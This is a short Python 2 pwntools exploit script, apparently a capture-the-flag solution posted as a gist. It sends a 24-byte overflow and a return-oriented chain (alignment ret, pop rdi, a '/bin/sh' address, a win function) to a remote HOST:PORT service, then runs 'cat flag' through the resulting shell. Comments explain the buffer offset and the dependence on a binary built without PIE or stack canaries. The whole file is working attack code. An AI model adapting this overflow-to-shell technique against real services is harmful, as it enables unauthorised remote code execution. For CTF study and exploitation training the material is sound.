@0xb0bb
Created May 23, 2019 16:48
#!/usr/bin/env python2
from pwn import *
import sys
# context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
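def fail(msg):
    """Log *msg* as a failure and terminate the process with exit status 1.

    Never returns: callers rely on this to stop the script.
    """
    log.info("Exploit failed: {}".format(msg))
    # sys.exit rather than the bare exit(): exit() is a helper that the site
    # module installs for interactive use and is missing under `python -S`.
    sys.exit(1)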
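def success(msg):
    """Log *msg* through log.success and terminate the process with status 1337.

    Never returns. On POSIX the parent only sees the low 8 bits of the exit
    status, so a process waiting on this script observes 57 (1337 % 256).
    """
    log.success("{}".format(msg))
    # sys.exit rather than the bare exit(): exit() is a helper that the site
    # module installs for interactive use and is missing under `python -S`.
    sys.exit(1337)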
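def main():
    """Send the payload to the HOST:PORT target in sys.argv[1] and return one reply line.

    The target is read from the first command-line argument, which must
    contain exactly one ':' (anything else raises ValueError on unpacking).
    Returns the first line received after the payload and the follow-up
    command, stripped of surrounding whitespace.

    What the payload shows about the target: 24 filler bytes followed by
    8-byte values is the shape of a stack buffer overflow that overwrites a
    saved return address (the 24-byte offset is presumably the distance from
    the buffer to that address; it cannot be confirmed from this script).
    Every address is an absolute literal, so the chain only lines up while
    the binary is mapped at a fixed base, presumably because it was built
    without PIE. A stack canary, or PIE combined with ASLR, would invalidate
    this layout.
    """
    HOST, PORT = sys.argv[1].split(':')
    io = remote(HOST, PORT)
    try:
        rop = cyclic(24)
        # ret: realigns the stack so system() does not crash on an SSE (xmm)
        # access that needs alignment
        rop += p64(0x40053e)
        rop += p64(0x400793)  # pop rdi ; ret
        rop += p64(0x400286)  # /bin/sh
        rop += p64(0x400698)  # win()
        # Echo the prompt without its last seven characters. A parenthesised
        # single argument prints the same under the python2 interpreter named
        # in the shebang.
        print(io.recvuntil(': ')[:-7])
        io.sendline(rop)
        io.sendline('cat flag')
        flag = io.recvline().strip()
    finally:
        # Close the connection on every path; the original left it open until
        # the process exited.
        io.close()
    return flag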
if __name__ == '__main__':
    # A HOST:PORT target is required as the first argument.
    if not sys.argv[1:]:
        fail('No target')
    flag = main()
    # Only a reply that starts with the expected "sctf{" prefix counts as
    # success. fail() and success() both terminate the process, so exactly one
    # of them runs.
    if not flag.startswith("sctf{"):
        fail("")
    success(flag)